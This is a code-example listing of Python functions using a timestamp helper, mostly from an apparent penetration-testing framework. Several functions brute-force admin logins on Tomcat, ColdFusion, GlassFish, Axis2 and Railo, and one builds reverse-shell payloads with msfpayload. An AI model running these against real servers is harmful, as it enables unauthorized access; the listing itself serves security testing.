Пример #1
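def wf_reader(filename, **kwargs):
    """Read a delimited waveform text file into a numeric matrix.

    Every line is split on the delimiter. Field 1 is kept as the time
    stamp and fields 2 onward as data columns; field 0 is ignored and
    lines with fewer than two fields are skipped.

    Keyword Args:
        header: When True, the first kept line is treated as column names
            and returned separately. Defaults to False.
        delimeter: Separator handed to ``str.split`` (the key keeps this
            spelling because callers already use it). Defaults to None,
            which splits on runs of whitespace.

    Returns:
        ``(names, matrix)`` when ``header`` is True, ``matrix`` when it is
        False, and None for any other value. The leading column(s) of
        ``matrix`` are whatever ``utility.timestamp(..., t0=True)`` returns
        for the time fields (presumably a column of seconds - confirm).
    """
    header = kwargs.get('header', False)
    delim = kwargs.get('delimeter', None)

    import numpy as np
    import utility as ut

    time, columns = [], []
    # The context manager closes the file even when a read fails part-way.
    with open(filename, 'r') as datafile:
        for line in datafile:
            # Split once per line instead of once per use.
            fields = line.strip().split(delim)
            if len(fields) >= 2:
                time.append(fields[1])
                columns.append(fields[2:])

    if header == True:
        matrix = np.array(columns[1:], dtype='float')
        matrix = np.hstack((ut.timestamp(time[1:], t0=True), matrix))
        return columns[0], matrix
    if header == False:
        matrix = np.array(columns, dtype='float')
        matrix = np.hstack((ut.timestamp(time, t0=True), matrix))
        return matrix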
Пример #2
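def get_unix_timestamp(dt_str1, dt_str2):
    """Convert *dt_str1* to a timestamp, repairing the string if parsing fails.

    ``utility.timestamp`` is tried on the raw string first. When it fails
    with an error containing 'must be in -1439' (NOTE(review): looks like a
    UTC-offset range check - confirm against utility.timestamp), the zone is
    rebuilt with ``replace_TZ(dt_str1, dt_str2)`` and parsing is retried.
    Any other failure, or a failed retry, is handed to ``fix_invalid_date``.

    Returns:
        The value from ``utility.timestamp``, or whatever
        ``fix_invalid_date`` returns for the string that could not be parsed.
    """
    try:
        return utility.timestamp(dt_str1)
    except Exception as err:
        if 'must be in -1439' not in str(err):
            # The fallback result used to be dropped, so callers got None.
            return fix_invalid_date(dt_str1)

        new_dt1 = replace_TZ(dt_str1, dt_str2)
        try:
            return utility.timestamp(new_dt1)
        except Exception:
            return fix_invalid_date(new_dt1)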
Пример #3
def define_env(settings_file_path=""):
    """
    Load the settings file and populate the shared Fabric ``env`` from it.

    The file at *settings_file_path* is parsed into the module-level
    ``config``; when the path does not exist a message is printed and
    ``abort`` is called. Every key of the ``[instance]`` section is then
    copied into ``env``, and the derived project paths, host list, ssh port
    and the boolean ``deploy_redcap_cron`` flag are filled in.
    """
    # Default, in case the settings file carries no deploy_redcap_cron key
    env.deploy_redcap_cron = False

    # The settings ("secrets") file has to exist before anything is read
    if not os.path.exists(settings_file_path):
        print("The secrets file path cannot be found. It is set to: %s" % settings_file_path)
        abort("Secrets File not set")
    else:
        config.read(settings_file_path)

    # NOTE(review): the return value is discarded - confirm whether
    # get_config is called for a side effect or its result was meant to be used.
    utility.get_config('deploy_user', settings_file_path)

    # Every key of [instance] lands in env unfiltered, so this file can set
    # any Fabric option; it deserves the same file permissions as the
    # secrets it holds.
    for key, val in config.items("instance"):
        env[key] = val

    # Values that have no counterpart in the vagrant.ini file
    stamp = utility.timestamp()
    env.remote_project_name = '%s-%s' % (env.project_path, stamp)
    env.live_project_full_path = "/".join((env.live_pre_path, env.project_path))
    env.backup_project_full_path = "/".join((env.backup_pre_path, env.project_path))
    env.upload_project_full_path = env.backup_pre_path

    env.hosts = [env.host]
    env.port = env.host_ssh_port

    # The flag may have arrived as text from the file; normalise it to a boolean
    env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
Пример #4
def waitServe(servert):
    """ Block until the _serve thread passed as servert has finished, or
    until ten one-second polls have gone by.  See _serve for more information.

    servert should be a running thread.

    Returns True when the thread ended before the polls ran out, False
    otherwise (including when the wait itself was interrupted).
    """

    budget = 10
    remaining = budget

    try:
        while servert.is_alive() and remaining > 0:
            stdout.flush()
            stdout.write("\r\033[32m [%s] Waiting for remote server to "
                         "download file [%ds]" %
                         (utility.timestamp(), remaining))
            sleep(1.0)
            remaining -= 1
    except BaseException:
        # any interruption of the wait, Ctrl-C included, counts as a timeout
        remaining = 0

    # the progress line was written at least once; finish it with a newline
    if remaining != budget:
        print('')

    if remaining == 0:
        utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
        return False

    return True
Пример #5
def define_env(settings_file_path=""):
    """
    Fill the shared Fabric ``env`` from the settings file.

    Reads *settings_file_path* into the module-level ``config`` (printing a
    message and calling ``abort`` when the path is missing), takes the
    deploy user from ``utility.get_config`` when it is non-empty, copies
    every key of the ``[instance]`` section into ``env`` and then derives
    the project paths, host list, ssh port and the boolean
    ``deploy_redcap_cron`` flag.
    """
    # Default used when the file does not mention deploy_redcap_cron
    env.deploy_redcap_cron = False

    # The settings ("secrets") file must be present before it can be parsed
    settings_present = os.path.exists(settings_file_path)
    if settings_present:
        config.read(settings_file_path)
    else:
        print("The secrets file path cannot be found. It is set to: %s" %
              settings_file_path)
        abort("Secrets File not set")

    # An empty deploy_user leaves env.user as it was
    if utility.get_config('deploy_user', settings_file_path) != "":
        env.user = utility.get_config('deploy_user', settings_file_path)

    # All keys of [instance] are copied without filtering, so the file can
    # override any Fabric option, env.user included; restrict who may edit it.
    for option, setting in config.items("instance"):
        env[option] = setting

    # Values that have no counterpart in the vagrant.ini file
    run_stamp = utility.timestamp()
    env.remote_project_name = '%s-%s' % (env.project_path, run_stamp)
    env.live_project_full_path = "/".join([env.live_pre_path, env.project_path])
    env.backup_project_full_path = "/".join([env.backup_pre_path, env.project_path])
    env.upload_project_full_path = env.backup_pre_path

    env.hosts = [env.host]
    env.port = env.host_ssh_port

    # Normalise the flag, which may be text from the file, to a boolean
    env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
Пример #6
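def waitServe(servert):
    """ Small function used to wait for a _serve thread to receive
    a GET request.  See _serve for more information.

    servert should be a running thread.

    The thread is polled once a second for at most ten seconds. Returns
    True when it ended within that time, False when the time ran out or the
    wait was interrupted.
    """

    timeout = 10
    status = False

    try:
        while servert.is_alive() and timeout > 0:
            stdout.flush()
            stdout.write("\r\033[32m [%s] Waiting for remote server to "
                         "download file [%ds]" % (utility.timestamp(), timeout))
            sleep(1.0)
            timeout -= 1
    except:
        # deliberately broad: Ctrl-C during the wait is treated as a timeout
        timeout = 0

    # Compare by value: 'is' against an int literal only works by accident
    # of the interpreter's small-integer caching.
    if timeout != 10:
        # print('') behaves the same under Python 2 and Python 3
        print('')

    if timeout == 0:
        utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
    else:
        status = True

    return status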
Пример #7
def checkAuth(ip, port, title):
    """Try to obtain an authenticated session for the interface named by *title*.

    Only ``GINTERFACES.GAD`` is handled; for any other title the function
    falls through and returns None. Credentials are tried in this order:

    1. ``state.usr_auth`` ("user:password"), if set; the ``_auth`` result is
       returned as-is and nothing else is tried.
    2. Each pair in ``default_credentials``.
    3. Every line of the ``state.bf_wordlist`` file as a password for
       ``state.bf_user``, unless ``state.hasbf`` is already set.

    Returns:
        The first truthy value returned by ``_auth`` (named ``cook`` here,
        presumably a session cookie - confirm against ``_auth``), or None.
    """

    if title == GINTERFACES.GAD:

        # NOTE(review): plain http - whatever _auth sends to this URL
        # travels unencrypted
        url = 'http://{0}:{1}/management/domain'.format(ip, port)

        # check with given auth
        if state.usr_auth:
            # a password that itself contains ':' makes this unpacking raise
            # ValueError
            (usr, pswd) = state.usr_auth.split(':')
            return _auth(usr, pswd, url)

        # else try default creds
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url)
            if cook:
                return cook

        # check for a supplied wordlist
        if state.bf_wordlist and not state.hasbf:

            # set before the attempt, so the wordlist pass is skipped for as
            # long as the flag stays set
            state.hasbf = True
            wordlist = []
            # one candidate per line; non-ASCII characters are dropped and
            # trailing whitespace is stripped
            with open(state.bf_wordlist, "r") as f:
                wordlist = [
                    x.decode("ascii", "ignore").rstrip()
                    for x in f.readlines()
                ]

            utility.Msg(
                "Brute forcing %s account with %d passwords..." %
                (state.bf_user, len(wordlist)), LOG.DEBUG)

            # One login attempt per candidate. On the target this shows up as
            # a run of failed logins for one account from one source, which
            # lockout or rate limiting on the admin interface cuts short.
            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write(
                        "\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                        % (utility.timestamp(), state.bf_user, idx + 1,
                           len(wordlist)))

                    cook = _auth(state.bf_user, word, url)
                    if cook:
                        print('')

                        # remember the accepted pair at the front of the
                        # default list
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0,
                                                       (state.bf_user, word))

                        # NOTE(review): the accepted password is written to
                        # the log in clear text; the log is sensitive from
                        # here on
                        utility.Msg(
                            "Successful login %s:%s" % (state.bf_user, word),
                            LOG.SUCCESS)
                        return cook

                print('')

            except KeyboardInterrupt:
                # Ctrl-C abandons the wordlist pass; the function returns None
                pass
Пример #8
def checkAuth(ip, port, title, version):
    """Try to obtain an authenticated session at /CFIDE/administrator/enter.cfm.

    *title* is not used here; *version* is passed through to ``_auth``.
    Credentials are tried in this order:

    1. ``state.usr_auth`` ("user:password"), if set; the ``_auth`` result is
       returned as-is and nothing else is tried.
    2. Each pair in ``default_credentials``.
    3. Every line of the ``state.bf_wordlist`` file as a password for
       ``state.bf_user``, unless ``state.hasbf`` is already set.

    Returns:
        The first truthy value returned by ``_auth`` (named ``cook`` here,
        presumably a session cookie - confirm against ``_auth``), or None
        when nothing is accepted, the wordlist cannot be read, or the
        wordlist pass is interrupted.
    """

    # NOTE(review): plain http - whatever _auth sends to this URL travels
    # unencrypted
    url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port)

    # check with given auth
    if state.usr_auth:
        # a password that itself contains ':' makes this unpacking raise
        # ValueError
        (usr, pswd) = state.usr_auth.split(':')
        return _auth(usr, pswd, url, version)

    # else try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # if we're still here, check if they supplied a wordlist
    if state.bf_wordlist and not state.hasbf:

        # set before the attempt, so the wordlist pass is skipped for as long
        # as the flag stays set
        state.hasbf = True
        wordlist = []
        try:
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()]
        except Exception, e:
            # an unreadable wordlist is reported and ends the call with None
            utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR)
            return

        utility.Msg("Brute forcing account %s with %d passwords..." %
                                (state.bf_user, len(wordlist)), LOG.DEBUG)

        # One login attempt per candidate. On the target this shows up as a
        # run of failed logins for one account from one source, which lockout
        # or rate limiting on the admin interface cuts short.
        try:

            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                                % (utility.timestamp(), state.bf_user, idx+1,
                                   len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print '' # newline

                    # remember the accepted pair at the front of the default
                    # list
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # NOTE(review): the accepted password is written to the
                    # log in clear text; the log is sensitive from here on
                    utility.Msg("Successful login %s:%s" %
                                        (state.bf_user, word), LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C abandons the wordlist pass; the function returns None
            pass
Пример #9
def checkAuth(ip, port, title, version):
    """Try to obtain an authenticated session at /axis2/axis2-admin/login.

    *title* is not used here; *version* is passed through to ``_auth``.
    Credentials are tried in this order:

    1. ``state.usr_auth`` ("user:password"), if set; the ``_auth`` result is
       returned as-is and nothing else is tried.
    2. Each pair in ``default_credentials``.
    3. Every line of the ``state.bf_wordlist`` file as a password for
       ``state.bf_user``, unless ``state.hasbf`` is already set.

    Returns:
        The first truthy value returned by ``_auth`` (named ``cook`` here,
        presumably a session cookie - confirm against ``_auth``), or None.
    """

    # NOTE(review): plain http - whatever _auth sends to this URL travels
    # unencrypted
    url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port)

    if state.usr_auth:
        # a password that itself contains ':' makes this unpacking raise
        # ValueError
        (usr, pswd) = state.usr_auth.split(":")
        return _auth(usr, pswd, url, version)

    # try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # bruteforce
    if state.bf_wordlist and not state.hasbf:

        # set before the attempt, so the wordlist pass is skipped for as long
        # as the flag stays set
        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, 'r') as f:
            # ensure its all ascii
            wordlist = [
                x.decode('ascii', 'ignore').rstrip() for x in f.readlines()
            ]

        utility.Msg(
            "Brute forcing %s account with %d passwords..." %
            (state.bf_user, len(wordlist)), LOG.DEBUG)

        # One login attempt per candidate. On the target this shows up as a
        # run of failed logins for one account from one source, which lockout
        # or rate limiting on the admin interface cuts short.
        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                                % (utility.timestamp(), state.bf_user,
                                   idx+1, len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print ''  # newline

                    # remember the accepted pair at the front of the default
                    # list
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # NOTE(review): there is no % between the format string
                    # and the tuple, so this line calls a str and raises
                    # TypeError instead of logging. The intended message
                    # would put the accepted password into the log in clear
                    # text.
                    utility.Msg("Successful login %s:%s" (state.bf_user, word),
                                LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C abandons the wordlist pass; the function returns None
            pass
Пример #10
def checkAuth(ip, port, title, version):
    """Try to obtain an authenticated session for the interface named by *title*.

    Only ``TINTERFACES.MAN`` (the /manager/html page) is handled; for any
    other title the function falls through and returns None. *version* is
    not used here. Credentials are tried in this order:

    1. ``state.usr_auth`` ("user:password"), if set; the ``_auth`` result is
       returned as-is and nothing else is tried.
    2. Each pair in ``default_credentials``.
    3. Every line of the ``state.bf_wordlist`` file as a password for
       ``state.bf_user``, unless ``state.hasbf`` is already set.

    Returns:
        The first truthy value returned by ``_auth`` (named ``cook`` here,
        presumably a session cookie - confirm against ``_auth``), or None.
    """

    if title == TINTERFACES.MAN:

        # NOTE(review): plain http - whatever _auth sends to this URL
        # travels unencrypted
        url = "http://{0}:{1}/manager/html".format(ip, port)

        # check with given auth
        if state.usr_auth:
            # a password that itself contains ':' makes this unpacking raise
            # ValueError
            (usr, pswd) = state.usr_auth.split(":")
            return _auth(usr, pswd, url)

        # else try default credentials
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url)
            if cook:
                return cook

        # if we're still here, check if they supplied a wordlist
        if state.bf_wordlist and not state.hasbf:

            # set before the attempt, so the wordlist pass is skipped for as
            # long as the flag stays set
            state.hasbf = True
            wordlist = []
            # one candidate per line; non-ASCII characters are dropped and
            # trailing whitespace is stripped
            with open(state.bf_wordlist, "r") as f:
                wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

            utility.Msg("Brute forcing %s account with %d passwords..." %
                                (state.bf_user, len(wordlist)), LOG.DEBUG)

            # One login attempt per candidate. On the target this shows up as
            # a run of failed logins for one account from one source, which
            # lockout or rate limiting on the admin interface cuts short.
            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                                    % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url)
                    if cook:
                        print ''

                        # lets insert these credentials to the default list so we
                        # don't need to bruteforce it each time
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # NOTE(review): the accepted password is written to
                        # the log in clear text; the log is sensitive from
                        # here on
                        utility.Msg("Successful login %s:%s" % (state.bf_user, word),
                                                                LOG.SUCCESS)
                        return cook

                print ''

            except KeyboardInterrupt:
                # Ctrl-C abandons the wordlist pass; the function returns None
                pass
Пример #11
def checkAuth(ip, port, title):
    """ Railo doesn't have usernames, so we only care about passwords

    The login URL is chosen from *title*: ``RINTERFACES.WEB`` or
    ``RINTERFACES.SRV``; any other title is logged as unsupported and the
    function returns None. When ``state.usr_auth`` is set, its password part
    is tried and the ``_auth`` result is returned as-is. Otherwise, if a
    wordlist is configured and ``state.hasbf`` is not yet set, every line of
    ``state.bf_wordlist`` is tried as the password.

    Returns the first truthy value from ``_auth`` (named ``cook`` here,
    presumably a session cookie - confirm against ``_auth``), or None.
    """

    # NOTE(review): both URLs are plain http - whatever _auth sends to them
    # travels unencrypted
    url = None
    if title is RINTERFACES.WEB:
        url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
    elif title is RINTERFACES.SRV:
        url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
    else:
        utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
        return

    if state.usr_auth:
        # check with given auth; handle both cases of "default" and ":default"
        if ':' in state.usr_auth:
            # more than one ':' in the value makes this unpacking raise
            # ValueError
            (_, pswd) = state.usr_auth.split(":")
        else:
            pswd = state.usr_auth
        return _auth(pswd, url, title)

    if state.bf_wordlist and not state.hasbf:

        # set before the attempt, so the wordlist pass is skipped for as long
        # as the flag stays set
        state.hasbf = True
        wordlist = []
        # one candidate per line; non-ASCII characters are dropped and
        # trailing whitespace is stripped
        with open(state.bf_wordlist, "r") as f:
            wordlist = [
                x.decode("ascii", "ignore").rstrip() for x in f.readlines()
            ]

        utility.Msg(
            "Brute forcing %s with %d passwords..." %
            (state.bf_user, len(wordlist)), LOG.DEBUG)

        # One login attempt per candidate. On the target this shows up as a
        # run of failed logins from one source, which lockout or rate
        # limiting on the admin interface cuts short.
        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write(
                    "\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                    % (utility.timestamp(), state.bf_user, idx + 1,
                       len(wordlist)))

                cook = _auth(word, url, title)
                if cook:
                    print ''
                    # NOTE(review): the accepted password is written to the
                    # log in clear text; the log is sensitive from here on
                    utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C abandons the wordlist pass; the function returns None
            pass
Пример #12
def checkAuth(ip, port, title):
    """Try to obtain an authenticated session for the interface named by *title*.

    Only ``GINTERFACES.GAD`` is handled; for any other title the function
    falls through and returns None. Credentials are tried in this order:

    1. ``state.usr_auth`` ("user:password"), if set; the ``_auth`` result is
       returned as-is and nothing else is tried.
    2. Each pair in ``default_credentials``.
    3. Every line of the ``state.bf_wordlist`` file as a password for
       ``state.bf_user``, unless ``state.hasbf`` is already set.

    Returns:
        The first truthy value returned by ``_auth`` (named ``cook`` here,
        presumably a session cookie - confirm against ``_auth``), or None.
    """

    if title == GINTERFACES.GAD:

        # NOTE(review): plain http - whatever _auth sends to this URL
        # travels unencrypted
        url = 'http://{0}:{1}/management/domain'.format(ip, port)

        # check with given auth
        if state.usr_auth:
            # a password that itself contains ':' makes this unpacking raise
            # ValueError
            (usr, pswd) = state.usr_auth.split(':')
            return _auth(usr, pswd, url)

        # else try default creds
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url)
            if cook:
                return cook

        # check for a supplied wordlist
        if state.bf_wordlist and not state.hasbf:

            # set before the attempt, so the wordlist pass is skipped for as
            # long as the flag stays set
            state.hasbf = True
            wordlist = []
            # one candidate per line; non-ASCII characters are dropped and
            # trailing whitespace is stripped
            with open(state.bf_wordlist, "r") as f:
                wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

            utility.Msg("Brute forcing %s account with %d passwords..." %
                            (state.bf_user, len(wordlist)), LOG.DEBUG)

            # One login attempt per candidate. On the target this shows up as
            # a run of failed logins for one account from one source, which
            # lockout or rate limiting on the admin interface cuts short.
            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                                    % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url)
                    if cook:
                        print ''

                        # remember the accepted pair at the front of the
                        # default list
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # NOTE(review): the accepted password is written to
                        # the log in clear text; the log is sensitive from
                        # here on
                        utility.Msg("Successful login %s:%s" % (state.bf_user, word),
                                                               LOG.SUCCESS)
                        return cook

                print ''

            except KeyboardInterrupt:
                # Ctrl-C abandons the wordlist pass; the function returns None
                pass
Пример #13
def checkAuth(ip, port, title, version):
    """Try to obtain an authenticated session at /axis2/axis2-admin/login.

    *title* is not used here; *version* is passed through to ``_auth``.
    Credentials are tried in this order:

    1. ``state.usr_auth`` ("user:password"), if set; the ``_auth`` result is
       returned as-is and nothing else is tried.
    2. Each pair in ``default_credentials``.
    3. Every line of the ``state.bf_wordlist`` file as a password for
       ``state.bf_user``, unless ``state.hasbf`` is already set.

    Returns:
        The first truthy value returned by ``_auth`` (named ``cook`` here,
        presumably a session cookie - confirm against ``_auth``), or None.
    """

    # NOTE(review): plain http - whatever _auth sends to this URL travels
    # unencrypted
    url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port)

    if state.usr_auth:
        # a password that itself contains ':' makes this unpacking raise
        # ValueError
        (usr, pswd) = state.usr_auth.split(":")
        return _auth(usr, pswd, url, version)

    # try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # bruteforce
    if state.bf_wordlist and not state.hasbf:

        # set before the attempt, so the wordlist pass is skipped for as long
        # as the flag stays set
        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, 'r') as f:
            # ensure its all ascii
            wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()]

        utility.Msg("Brute forcing %s account with %d passwords..." %
                        (state.bf_user, len(wordlist)), LOG.DEBUG)

        # One login attempt per candidate. On the target this shows up as a
        # run of failed logins for one account from one source, which lockout
        # or rate limiting on the admin interface cuts short.
        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                                % (utility.timestamp(), state.bf_user,
                                   idx+1, len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print '' # newline

                    # remember the accepted pair at the front of the default
                    # list
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # NOTE(review): there is no % between the format string
                    # and the tuple, so this line calls a str and raises
                    # TypeError instead of logging. The intended message
                    # would put the accepted password into the log in clear
                    # text.
                    utility.Msg("Successful login %s:%s"
                                    (state.bf_user, word), LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C abandons the wordlist pass; the function returns None
            pass
Пример #14
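def backup_database(options=""):
    """
    Backup a mysql database from the remote host with mysqldump options in *options*.

    The backup file will be time stamped with a name like 'redcap-<instance_name>-20170126T1620.sql.gz'
    The latest backup file will be linked to name 'redcap-<instance_name>-latest.sql.gz'

    ``utility.write_remote_my_cnf`` runs first and ``utility.delete_remote_my_cnf``
    always runs last, also when the dump or the link step fails.
    """
    utility.write_remote_my_cnf()
    try:
        now = utility.timestamp()
        with settings(user=env.deploy_user):
            # NOTE(review): options and the env values are pasted into the
            # shell command unquoted, so they must come from trusted
            # configuration only. The exit status of a pipeline is gzip's,
            # so a failed mysqldump can still leave a (truncated) .gz that
            # the next line links as "latest" - confirm this is acceptable.
            run("mysqldump --skip-lock-tables %s -u %s -h %s %s | gzip > redcap-%s-%s.sql.gz" % \
                (options, env.database_user, env.database_host, env.database_name, env.instance_name, now))
            run("ln -sf redcap-%s-%s.sql.gz redcap-%s-latest.sql.gz" % (env.instance_name, now, env.instance_name))
    finally:
        # Without the finally, a failed run() left the remote my.cnf
        # (presumably holding the database credentials - confirm) behind.
        utility.delete_remote_my_cnf()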
Пример #15
def run(options):
    """ This module is used for generating reverse shell payloads.  It's not
    flexible in what sorts of payloads it can generate, but this is by design.

    Highly customized payloads, or stuff like meterpreter/reverse java payloads
    should be generated using proper tools, such as msfpayload.  This is merely
    a quick way for us to get a reverse shell on a remote system.

    ``options.remote_os`` and ``options.remote_service`` must be set and
    ``msfpayload`` must be found by ``which``; otherwise an error is logged
    and the function returns. ``options.generate_payload`` is read as
    "host:port". Nothing is returned; the outcome is reported through
    ``utility.Msg``.
    """

    if not options.remote_os:
        utility.Msg("Please specify a remote os (-o)", LOG.ERROR)
        return

    if not options.remote_service:
        utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
        return
    elif options.remote_service in ["coldfusion"]:
        out = "R > shell.jsp"

    # the external generator has to be installed on the operator's machine
    if getoutput("which msfpayload") == "":
        utility.Msg("This option requires msfpayload", LOG.ERROR)
        return

    payload = fetch_payload(options)
    out = "W > shell.war"

    if not payload:
        utility.Msg(
            "Platform %s unsupported" % fingerengine.options.remote_service,
            LOG.ERROR)
        return

    utility.Msg("Generating payload....")
    # a value with more or fewer than one ':' makes this unpacking raise
    # ValueError
    (lhost, lport) = options.generate_payload.split(":")

    # NOTE(review): lhost and lport come straight from the option string and
    # are pasted into a shell command line unquoted; validating them as a
    # host and a port number first keeps shell metacharacters out of the
    # operator's own shell.
    resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" %
                     (payload, lhost, lport, out))

    if "Created by" in resp:
        utility.Msg("Payload generated (%s).  Payload: %s" %
                    (out.split(' ')[2], payload))

        # also log some auxiliary information
        # (generation time, listener address and payload name go to
        # ./src/lib/shell.log, each written through a separate shell echo)
        getoutput("echo Generated at %s > ./src/lib/shell.log" %
                  utility.timestamp())
        getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
        getoutput("echo %s >> ./src/lib/shell.log" % (payload))
    else:
        utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
Пример #16
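def backup_database(options=""):
    """
    Backup a mysql database from the remote host with mysqldump options in *options*.

    The backup file will be time stamped with a name like 'redcap-<instance_name>-20170126T1620.sql.gz'
    The latest backup file will be linked to name 'redcap-<instance_name>-latest.sql.gz'

    The remote my.cnf written by ``utility.write_remote_my_cnf`` is removed
    again by ``utility.delete_remote_my_cnf`` in every case, including a
    failed dump or link step.
    """
    utility.write_remote_my_cnf()
    try:
        now = utility.timestamp()
        with settings(user=env.deploy_user):
            # NOTE(review): options and the env values reach the remote shell
            # unquoted; they are only safe while they come from trusted
            # configuration. A pipeline reports gzip's exit status, so a
            # failing mysqldump may still produce a file that is then linked
            # as "latest" - confirm this is acceptable.
            run("mysqldump --skip-lock-tables %s -u %s -h %s %s | gzip > redcap-%s-%s.sql.gz" % \
                (options, env.database_user, env.database_host, env.database_name, env.instance_name, now))
            run("ln -sf redcap-%s-%s.sql.gz redcap-%s-latest.sql.gz" %
                (env.instance_name, now, env.instance_name))
    finally:
        # Previously skipped when run() failed, which left the remote my.cnf
        # (presumably holding the database credentials - confirm) in place.
        utility.delete_remote_my_cnf()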
Пример #17
def checkAuth(ip, port, title):
    """ Railo doesn't have usernames, so we only care about passwords

    The login URL is chosen from *title*: ``RINTERFACES.WEB`` or
    ``RINTERFACES.SRV``; any other title is logged as unsupported and the
    function returns None. When ``state.usr_auth`` is set, its password part
    is tried and the ``_auth`` result is returned as-is. Otherwise, if a
    wordlist is configured and ``state.hasbf`` is not yet set, every line of
    ``state.bf_wordlist`` is tried as the password.

    Returns the first truthy value from ``_auth`` (named ``cook`` here,
    presumably a session cookie - confirm against ``_auth``), or None.
    """

    # NOTE(review): both URLs are plain http - whatever _auth sends to them
    # travels unencrypted
    url = None            
    if title is RINTERFACES.WEB:
        url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
    elif title is RINTERFACES.SRV:
        url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
    else:
        utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
        return

    if state.usr_auth:
        # check with given auth; handle both cases of "default" and ":default"
        if ':' in state.usr_auth:
            # more than one ':' in the value makes this unpacking raise
            # ValueError
            (_, pswd) = state.usr_auth.split(":")
        else:
            pswd = state.usr_auth
        return _auth(pswd, url, title)

    if state.bf_wordlist and not state.hasbf:

        # set before the attempt, so the wordlist pass is skipped for as long
        # as the flag stays set
        state.hasbf = True
        wordlist = []
        # one candidate per line; non-ASCII characters are dropped and
        # trailing whitespace is stripped
        with open(state.bf_wordlist, "r") as f:
            wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

        utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
                                len(wordlist)), LOG.DEBUG)

        # One login attempt per candidate. On the target this shows up as a
        # run of failed logins from one source, which lockout or rate
        # limiting on the admin interface cuts short.
        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                                % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                cook = _auth(word, url, title)
                if cook:
                    print ''
                    # NOTE(review): the accepted password is written to the
                    # log in clear text; the log is sensitive from here on
                    utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C abandons the wordlist pass; the function returns None
            pass
Пример #18
def run(options):
    """ This module is used for generating reverse shell payloads.  It's not
    flexible in what sorts of payloads it can generate, but this is by design.

    Highly customized payloads, or stuff like meterpreter/reverse java payloads
    should be generated using proper tools, such as msfpayload.  This is merely
    a quick way for us to get a reverse shell on a remote system.

